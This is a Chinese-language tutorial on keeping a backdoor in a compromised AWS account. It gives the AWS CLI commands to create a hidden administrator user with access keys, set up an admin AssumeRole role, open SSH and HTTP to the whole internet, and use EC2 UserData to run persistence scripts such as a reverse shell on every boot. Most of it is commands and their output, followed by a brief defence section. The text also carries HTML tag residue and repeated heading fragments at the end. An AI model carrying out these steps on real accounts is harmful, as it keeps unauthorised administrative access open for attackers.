AWS持久化后门利用技术详解<\/h1>

1. 创建后门用户与访问密钥<\/h2>

1.1 创建后门用户<\/h3>

当获得高权限AWS账户后，首先应创建一个隐藏的后门用户：<\/p>

aws iam create-user --user-name backdor
<\/span><\/span><\/code><\/pre>1.2 分配管理员权限<\/h3>
为新创建的用户附加管理员策略：<\/p>
aws iam attach-user-policy --user-name backdor --policy-arn arn:aws:iam::aws:policy\/AdministratorAccess
<\/span><\/span><\/code><\/pre>1.3 创建访问密钥<\/h3>
为后门用户生成访问密钥：<\/p>
aws iam create-access-key --user-name backdor
<\/span><\/span><\/code><\/pre>返回结果包含AccessKeyId<\/code>和SecretAccessKey<\/code>，需妥善保存：<\/p>
{
<\/span><\/span>  "AccessKey"<\/span>: {
<\/span><\/span>    "UserName"<\/span>: "backdor"<\/span>,
<\/span><\/span>    "AccessKeyId"<\/span>: "xxxxxxx"<\/span>,
<\/span><\/span>    "Status"<\/span>: "Active"<\/span>,
<\/span><\/span>    "SecretAccessKey"<\/span>: "xxxxxx"<\/span>,
<\/span><\/span>    "CreateDate"<\/span>: "2025-01-05T13:55:03Z"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. AssumeRole持久化技术<\/h2>
2.1 基本概念<\/h3>

IAM用户<\/strong>：具有长期凭证的固定身份<\/li>
IAM角色<\/strong>：无长期凭证的虚拟身份，通过AssumeRole获取临时凭证<\/li>
<\/ul>
2.2 创建普通用户<\/h3>
aws iam create-user --user-name normal
<\/span><\/span><\/code><\/pre>2.3 创建AssumeRole策略<\/h3>
创建JSON策略文件1.json<\/code>：<\/p>
{
<\/span><\/span>  "Version"<\/span>: "2012-10-17"<\/span>,
<\/span><\/span>  "Statement"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "Effect"<\/span>: "Allow"<\/span>,
<\/span><\/span>      "Principal"<\/span>: {
<\/span><\/span>        "AWS"<\/span>: "arn:aws:iam::985539798290:user\/normal"<\/span>
<\/span><\/span>      },
<\/span><\/span>      "Action"<\/span>: "sts:AssumeRole"<\/span>,
<\/span><\/span>      "Condition"<\/span>: {}
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 创建角色并附加策略<\/h3>
aws iam create-role --role-name back2 --assume-role-policy-document file:\/\/\/root\/1.json
<\/span><\/span>aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy\/AdministratorAccess --role-name back2
<\/span><\/span><\/code><\/pre>2.5 使用STS AssumeRole<\/h3>
aws sts assume-role --role-arn arn:aws:iam::xxxxxxxxxxxx:role\/back2 --role-session-name back2-session --profile 后门用户的配置文件
<\/span><\/span><\/code><\/pre>返回临时凭证：<\/p>
{
<\/span><\/span>  "Credentials"<\/span>: {
<\/span><\/span>    "AccessKeyId"<\/span>: "ASIA...."<\/span>,
<\/span><\/span>    "SecretAccessKey"<\/span>: "secret...."<\/span>,
<\/span><\/span>    "SessionToken"<\/span>: "session...."<\/span>,
<\/span><\/span>    "Expiration"<\/span>: "2025-01-01T12:00:00Z"<\/span>
<\/span><\/span>  },
<\/span><\/span>  "AssumedRoleUser"<\/span>: {
<\/span><\/span>    "AssumedRoleId"<\/span>: "ARO...."<\/span>,
<\/span><\/span>    "Arn"<\/span>: "xxxx"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>注意<\/strong>：临时凭证有有效期限制，需要定期更新。<\/p>
3. 修改EC2安全组实现持久化<\/h2>
3.1 创建开放的安全组<\/h3>
aws ec2 create-security-group --group-name my-security-group --description "My new security group"<\/span>
<\/span><\/span><\/code><\/pre>3.2 添加入站规则<\/h3>
开放22和80端口：<\/p>
aws ec2 authorize-security-group-ingress --group-id sg-00380a8bac3c737b8 --protocol tcp --port 22<\/span> --cidr 0.0.0.0\/0
<\/span><\/span>aws ec2 authorize-security-group-ingress --group-id sg-00380a8bac3c737b8 --protocol tcp --port 80<\/span> --cidr 0.0.0.0\/0
<\/span><\/span><\/code><\/pre>3.3 查询实例ID<\/h3>
aws ec2 describe-instances
<\/span><\/span><\/code><\/pre>3.4 修改实例安全组<\/h3>
aws ec2 modify-instance-attribute --instance-id i-0183d702137794a80 --groups sg-00380a8bac3c737b8
<\/span><\/span><\/code><\/pre>4. 利用EC2 UserData实现持久化<\/h2>
4.1 UserData基本概念<\/h3>
UserData脚本在EC2实例首次启动时自动运行，通过配置可实现每次重启都运行。<\/p>
4.2 关键配置<\/h3>
脚本中必须包含：<\/p>
#cloud-config<\/span>
<\/span><\/span>cloud_final_modules<\/span>:
<\/span><\/span>- [scripts-user, always]<\/span>
<\/span><\/span><\/code><\/pre>4.3 操作步骤<\/h3>

停止目标实例：<\/li>
<\/ol>
aws ec2 stop-instances --instance-ids i-xxx
<\/span><\/span><\/code><\/pre>

编辑UserData（通过控制台或CLI）<\/p>
<\/li>

添加持久化脚本，例如反弹shell或写入公钥<\/p>
<\/li>

启动实例<\/p>
<\/li>
<\/ol>
4.4 查看现有UserData<\/h3>
aws ec2 describe-instance-attribute --instance-id i-0183d702137794a80 --attribute userData --query "UserData.Value"<\/span>
<\/span><\/span><\/code><\/pre>返回Base64编码内容，解码后可见实际脚本。<\/p>
5. 防御建议<\/h2>

最小权限原则<\/strong>：严格限制IAM用户和角色的权限<\/li>
监控异常活动<\/strong>：启用CloudTrail记录所有API调用<\/li>
定期轮换凭证<\/strong>：定期更换访问密钥<\/li>
安全组审核<\/strong>：定期检查安全组规则，避免0.0.0.0\/0开放<\/li>
UserData审查<\/strong>：检查EC2实例的UserData内容<\/li>
MFA启用<\/strong>：为高权限账户启用多因素认证<\/li>
<\/ol>
6. 总结<\/h2>
AWS环境中持久化后门技术主要包括：<\/p>

创建隐藏的高权限用户和访问密钥<\/li>
利用AssumeRole机制获取临时凭证<\/li>
修改安全组规则开放关键端口<\/li>
利用UserData实现脚本级持久化<\/li>
<\/ul>
防御方应全面监控这些关键点，及时发现和阻断攻击者的持久化尝试。<\/p>

AWS持久化后门利用技术详解<\/h1>

1. 创建后门用户与访问密钥<\/h2>

2. AssumeRole持久化技术<\/h2>

4. 利用EC2 UserData实现持久化<\/h2>

4.1 UserData基本概念<\/h3> UserData脚本在EC2实例首次启动时自动运行，通过配置可实现每次重启都运行。<\/p>

4.1 UserData基本概念<\/h3>
UserData脚本在EC2实例首次启动时自动运行，通过配置可实现每次重启都运行。<\/p>